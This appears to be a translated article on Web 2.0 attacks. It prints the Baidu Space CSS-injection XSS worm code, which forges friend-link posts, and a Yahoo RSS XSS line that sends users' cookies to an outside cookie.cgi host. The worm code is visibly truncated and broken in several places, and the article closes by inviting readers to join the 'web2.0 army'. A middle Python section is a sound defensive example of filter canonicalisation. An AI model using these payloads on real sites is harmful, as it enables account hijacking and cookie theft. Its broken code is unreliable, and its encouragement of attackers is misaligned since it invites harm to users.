This is a glimpse of Ajax attacks, but it is only the beginning. Baidu opened Baidu Space in July. Nothing announces it as a web2.0 application, but the web2.0 hallmarks of a "beta" label and a page-template architecture show that it does in fact use Ajax technology. Less than half a month after the space opened, a matching attack appeared, and it should be counted as a worm. It exploits the custom CSS (Cascading Style Sheet) feature: CSS submitted to Baidu was not filtered for embedded JavaScript, so an attacker could write malicious code for XSS (cross-site scripting). The result is that Baidu Passport users who merely browse the space have the attacker's friendship link added to their own site without noticing. The original code specimen is as follows:
```css
#header {height:89px;background:url("javascript:document.body.onload = function () { // JavaScript inserted inside a CSS property value
var req = null;
if (window.XMLHttpRequest) req = new XMLHttpRequest(); // this is what is called Ajax: its core is XMLHttpRequest, and what follows is the usual branch for detecting IE
else if (window.ActiveXObject) {
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var i=0;i try{req.overrideMimeType('text/xml')}catch(e){} // loop body truncated in the source
}
req.open('GET', '.', false);
req.send();
var s=req.responseText;
p=s.indexOf('passport.baidu.com/?logout');
if (p>0)
{
p=s.indexOf("); // search string missing in the source
if (p>0)
{
p=s.indexOf('/', p);
p2=s.indexOf(String.fromCharCode), p); // argument missing in the source
var user=s.substring(p+1,p2);
var name='Here is a bad site';
var link='target URL';
var desc='This link is added by an XSS script';
var url='/'+user+'/commit';
var data='ct=6&cm=1&spref='+escape('http://hi.baidu.com/'+user)+'%2fmodify%2fbuddylink%2f0&spbuddyname='+escape(name)+'&spbuddyurl='+escape(link)+'&spbuddyintro='+escape(desc); // this statement is the whole worm's payload, and it is also the asynchronous Ajax data call
req.open('POST', url, false);
req.send(data);
alert('A friend link has been added to your space at http://hi.baidu.com/'+user);
}
}
else{alert('You are not a logged-in Baidu user.')} // because this is a specimen there is a check for whether the user is logged in, and of course no actual attack
}");
}
```
When the worm first appeared, Baidu responded by filtering JavaScript submitted in the form, which of course also meant that normal users could no longer embed Flash animations in their blogs. Later variants made things worse, because it turned out that Baidu was simply stripping strings such as "javascript" and "expression" from the CSS text. In other words, writing "javascript" split across two lines bypasses Baidu's filter and is still executed by IE. A mutated worm followed, with the result that the following code is added to the user's CSS:
```css
#header {...
```
Quite simply, this lifted the worm almost to the level of a virus, because the affected user could no longer even reach the CSS modification page to repair his own CSS. In fact, as of this writing, Baidu Space still has no effective filtering or blocking for the various alternative ways of inserting malicious code.
If one thinks these effects are local, then consider the attacks with a far wider reach on the most web2.0 of technologies, RSS (Really Simple Syndication). I learned of this from ZDNet's Joris Evers in "Blog feeds may carry security risk". The gist is that almost no online or offline RSS reader effectively filters scripts mixed into a feed, so an attacker can write malicious JavaScript into RSS, which ends in cross-site scripting, theft of user information or worse. The well-known Bloglines, RSS Reader, RSSOwl, FeedDemon and SharpReader are all within range. This is the earlier Yahoo RSS XSS code:
```
Javascript:%20document.location='http://www.target.com/cookie.cgi?'%20+document.cookie;
Should Steal Your cookies.
Tue, Sep 23:55:18 EDT
Javascript:%20alert(Document.cookie);
Should Steal Your cookies.
Tue, Sep 23:55:18 EDT
```
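The Baidu Space filter weakness described above (deleting the literal strings "javascript" and "expression", which a line break defeats) and the feed links just shown (a "javascript:" scheme with a percent-encoded space) fail for the same reason: the check runs on the raw text, while the browser percent-decodes and strips whitespace before deciding which scheme to invoke. The following Python is an added example written for this page, not code from Baidu, Yahoo or the article; the sample CSS, feed links and all function names are constructed for illustration. It reproduces the naive filter, then shows the defence a practitioner would apply on the server before storing custom CSS or rendering a feed item: canonicalise the value first, then allowlist the scheme.

```python
import re
from urllib.parse import unquote

# Constructed samples modelled on the article's two specimens (not the
# original worm payload): a CSS url() whose scheme is split across a line
# break, and a feed link with a percent-encoded space after the scheme.
SPLIT_CSS = '#header {height:89px;background:url("java\nscript:document.body.onload=function(){}")}'
PLAIN_CSS = '#header {height:89px;background:url("/img/header.png")}'
FEED_LINK = "Javascript:%20alert(Document.cookie);"
GOOD_LINK = "http://example.com/post/1"


def naive_css_filter(css):
    """The weak approach the article describes: delete the literal
    substrings 'javascript' and 'expression'.  A scheme written as
    'java\\nscript' passes through untouched."""
    out = css
    for word in ("javascript", "expression"):
        out = re.sub(re.escape(word), "", out, flags=re.IGNORECASE)
    return out


_STRIP = re.compile(r"[\s\x00-\x1f\x7f]")          # whitespace and control chars
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)
ALLOWED_SCHEMES = {"http", "https"}


def canonicalize(value):
    """Percent-decode repeatedly (so %256A cannot hide a 'j') and drop
    whitespace and control characters, approximating what the browser
    does before it chooses a scheme handler."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return _STRIP.sub("", value)


def scheme_of(value):
    """Scheme of the canonicalised value in lower case, '' if relative."""
    m = _SCHEME.match(canonicalize(value))
    return m.group(1).lower() if m else ""


_CSS_URL = re.compile(r"url\(\s*(['\"]?)(.*?)\1\s*\)", re.IGNORECASE | re.DOTALL)


def css_is_safe(css):
    """Accept user CSS only if every url() is relative or http(s) and no
    IE expression() survives canonicalisation."""
    if "expression(" in canonicalize(css).lower():
        return False
    for m in _CSS_URL.finditer(css):
        scheme = scheme_of(m.group(2))
        if scheme and scheme not in ALLOWED_SCHEMES:
            return False
    return True


def feed_link_is_safe(link):
    """A feed item's link must be absolute http(s); anything else,
    including a 'javascript:' scheme dressed up with %20, is rejected."""
    return scheme_of(link) in ALLOWED_SCHEMES


if __name__ == "__main__":
    print("naive filter changed split CSS:", naive_css_filter(SPLIT_CSS) != SPLIT_CSS)
    print("split CSS safe:", css_is_safe(SPLIT_CSS))
    print("plain CSS safe:", css_is_safe(PLAIN_CSS))
    print("feed link safe:", feed_link_is_safe(FEED_LINK))
    print("good link safe:", feed_link_is_safe(GOOD_LINK))
```

The important design choice is the order of operations: the scheme is taken from the canonicalised value rather than searching the raw text for forbidden words, and the decision is an allowlist (http, https, or relative for CSS) rather than a denylist, so new spellings of the same scheme do not need new filter rules.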
In fact the first web2.0 attack appeared on MySpace last year, when someone wrote a JavaScript worm on the MySpace dating site that used Ajax to make countless users add him to their buddy lists without their knowledge and then automatically append the words "Samy is my hero". This worm is called the world's first "web2.0 worm". From the descriptions above of attacks on email, CSS and RSS you can also see that current attacks exploiting web2.0 are many-sided. Nor is it only cross-site scripting: a "Hacking Ajax" article on the web adds one sentence in bold, "by corrupting one of the dozens of data exchanges Ajax handles while loading a Web page, a hacker can take over control of the PC", which means that an Ajax attack could also, under the right conditions, be exploited to gain administrative authority on the PC.
Because systems today are always up to date with released patches, getting a shell through an overflow is hard unless it is a 0-day system vulnerability; SQL injection has raged across the network for several years and effective defences now exist; and with the rise of the Python and Ruby languages, new web2.0 services keep emerging and show a trend of replacing the existing web architecture, Plone for instance. What does not change is the web browser's interpretation of XHTML and JavaScript, and as long as we retain the possibility of altering JavaScript, we retain the possibility of elevating our own privileges ...
Are you interested in joining the growing ranks of the web2.0 army?